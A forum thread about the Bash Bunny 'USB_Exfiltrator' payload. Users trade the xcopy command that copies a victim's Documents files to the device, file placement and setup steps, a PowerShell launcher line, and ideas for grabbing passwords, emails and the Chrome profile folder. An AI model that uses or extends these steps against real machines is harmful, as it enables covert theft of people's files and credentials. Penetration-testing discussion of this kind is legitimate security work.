Jump to content

[PAYLOAD] USB_Exfiltrator


Recommended Posts

5 minutes ago, peterkozmd said:

Can there be a version that snags also images, address books,emails, bookmarks, passwords,etc.  an AIO (all-in one) that takes anything remotely interesting =)

You can adapt it really easy.

xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul

Just change the *.pdf in line 22 of the e.cmd file to whatever you want.

Link to post
Share on other sites

Though as @Seczilla said the payload can be modified the bash bunny only has 8GB of storage and an all in one of those might possibly become full VERY quickly.  I think it would be more practical to do like with the Rubber Ducky where it extracts to a separate USB with a specific file name.

Link to post
Share on other sites

I must be doing something wrong.  I get the flashing white " Dependencies not met. Responder not installed in /pentest "  

I tried loading the tools and think I did it right.  Also the Bunny does not show up as a WiFi device when I run that script.

 

Link to post
Share on other sites

I have not received my bunny yet (march 10th batch) but had an idea for this, because of the limited space on the bunny 8 GB SSD would it be possible to reroute the loot file directory onto another usb drive then

 cd /media/usr_name/drive_name/loot

then store files on the other larger/faster driver? would have to have a variable for the usr_name then once found use that to cd onto the other drive I will try to develop farther once I receive mine but anybody got any ideas for this?

Edited by Tylor B.
  • Upvote 1
Link to post
Share on other sites

Something I noticed and perhaps done by design.  After running this payload on a windows 10 system:

  • the 'loot' is captured as expected however the files 'd.cmd e.cmd and i.vbs are now located on the root of the BashBunny in arming mode.
  • in the 'switch2' the install.sh is appended -INSTALLED

Does anyone else observe this on theirs and is that done by design?

Link to post
Share on other sites
10 hours ago, gmonk said:

Something I noticed and perhaps done by design.  After running this payload on a windows 10 system:

  • the 'loot' is captured as expected however the files 'd.cmd e.cmd and i.vbs are now located on the root of the BashBunny in arming mode.
  • in the 'switch2' the install.sh is appended -INSTALLED

Does anyone else observe this on theirs and is that done by design?

Yup, that's by design. I believe the logic being that the Powershell command needs to know the path that it is executing the cmd file from, so it finds the drive letter of the storage with the name "BashBunny", and then appends d.cmd to it (I think it was d.cmd anyway... it's whichever one kick starts it all).

If it didn't copy the files into the root, then it may make it more difficult to know where the files are, due to it being potentially in two different locations (i.e. switch1 or switch2). I might see if it's possible to run it all within a switch folder instead of moving them, but I suspect it might not be doable!

The appending of "INSTALLED" is to prevent the install.sh file being executed a second time for subsequent payload executions, as all the files are in the place they need to be.

Link to post
Share on other sites

I have this attack working on my rubber ducky but for some reason I am not cracking the code on how you got this to work on the bash bunny.

What were the steps you followed to get this payload to work because I am not understanding what needs to go where?

1. Move switch to ARM

2. Navigate to Switch# folder

3. Drop d.cmd, e.cmd, i.vbs, payload.txt into folder

4. Eject the device

5. Move switch to Switch#

6. Insert device

7. Profit

I modified the payload so I could see what it is hanging up on and it is not getting the switch value from bunny_helpers.sh:

powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads$SWITCH_POSITION\d.cmd')
. : The term 'D:\payloads$SWITCH_POSITION\d.cmd' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:2
+ .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads$SWITCH_ ...
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (D:\payloads$SWITCH_POSITION\d.cmd:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

 

Does bunny_helpers.sh need to be somewhere special?

Link to post
Share on other sites
12 minutes ago, TTommy said:

I have this attack working on my rubber ducky but for some reason I am not cracking the code on how you got this to work on the bash bunny.

What were the steps you followed to get this payload to work because I am not understanding what needs to go where?

1. Move switch to ARM

2. Navigate to Switch# folder

3. Drop d.cmd, e.cmd, i.vbs, payload.txt into folder

4. Eject the device

5. Move switch to Switch#

6. Insert device

7. Profit

I modified the payload so I could see what it is hanging up on and it is not getting the switch value from bunny_helpers.sh:

powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads$SWITCH_POSITION\d.cmd')
. : The term 'D:\payloads$SWITCH_POSITION\d.cmd' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:2
+ .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads$SWITCH_ ...
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (D:\payloads$SWITCH_POSITION\d.cmd:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

 

Does bunny_helpers.sh need to be somewhere special?

I tested using the previous version of the payload, that installs the cmd files and vbs file into the root. It looks like you're using the latest version which is supposed to keep everything inside the switch* folder.

If you want to use the previous version, you can grab the files from commit dcace71 on GitHub / this link: https://github.com/hak5/bashbunny-payloads/tree/dcace71e99bfb9e69cd02c30b4bb6db60f93d9d4/payloads/library/usb_exfiltrator

I'll give the new version a test too, and see if I can replicate the problem / try to fix it :)

 

Link to post
Share on other sites
11 hours ago, rastating said:

Yup, that's by design. I believe the logic being that the Powershell command needs to know the path that it is executing the cmd file from, so it finds the drive letter of the storage with the name "BashBunny", and then appends d.cmd to it (I think it was d.cmd anyway... it's whichever one kick starts it all).

If it didn't copy the files into the root, then it may make it more difficult to know where the files are, due to it being potentially in two different locations (i.e. switch1 or switch2). I might see if it's possible to run it all within a switch folder instead of moving them, but I suspect it might not be doable!

The appending of "INSTALLED" is to prevent the install.sh file being executed a second time for subsequent payload executions, as all the files are in the place they need to be.

Def good to know, thanks for explaining!

Link to post
Share on other sites

Hey guys quick question,

May be a noob question but I'm trying to get this payload to work. Where do i put d.cmd, e.cmd, and i.vbs files? do they go in the switch1 folder along with the payload or do they go in the library folder?

Thank you,
kpeezy

Link to post
Share on other sites
1 hour ago, kpeezy said:

Hey guys quick question,

May be a noob question but I'm trying to get this payload to work. Where do i put d.cmd, e.cmd, and i.vbs files? do they go in the switch1 folder along with the payload or do they go in the library folder?

Thank you,
kpeezy

Yes!  Copy the contents of the folder over to the switch folder.  They call each other, and each one assumes the next one is in the same location.  Good luck!

Link to post
Share on other sites
3 hours ago, Black_chameleon said:

Yes!  Copy the contents of the folder over to the switch folder.  They call each other, and each one assumes the next one is in the same location.  Good luck!

Thanks alot! Just got er workin! BADASS! :ph34r:

Link to post
Share on other sites

I altered this script to copy a folder from appdata. It copied OK and worked fine, light turned green, safely removed, etc. Problem now is when I go to delete the folder, nothing happens in Windows explorer. The stuff in question is the Chrome folder from %appdata% - I can delete individual files within subdirectories on my Bash Bunny, but when I try to delete or access certain folders in my loot, I get no activity or a message saying

Location is not available - The file or directory is corrupted and unreadable.

What gives? What can I run via cmd line to delete these ghost folders now?

PS: Every time my script finishes, I hear a Ghostbuster saying "light is green; trap is clean"

Link to post
Share on other sites

Is there a log file or anything to see results on what occurred? Just tested this payload and while it created the folder of my machine it never copied any documents into that folder. Yes, there are .pdf files in the documents folder. Just trying to figure out why nothing copied over the the loot directory when the folder got created with my machines hostname.

Thanks!

Link to post
Share on other sites
On 3/15/2017 at 0:01 PM, nutt318 said:

Is there a log file or anything to see results on what occurred? Just tested this payload and while it created the folder of my machine it never copied any documents into that folder. Yes, there are .pdf files in the documents folder. Just trying to figure out why nothing copied over the the loot directory when the folder got created with my machines hostname.

Thanks!

I have yet to see any log file. Though, I suppose you could have it write one along-side what it's doing.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...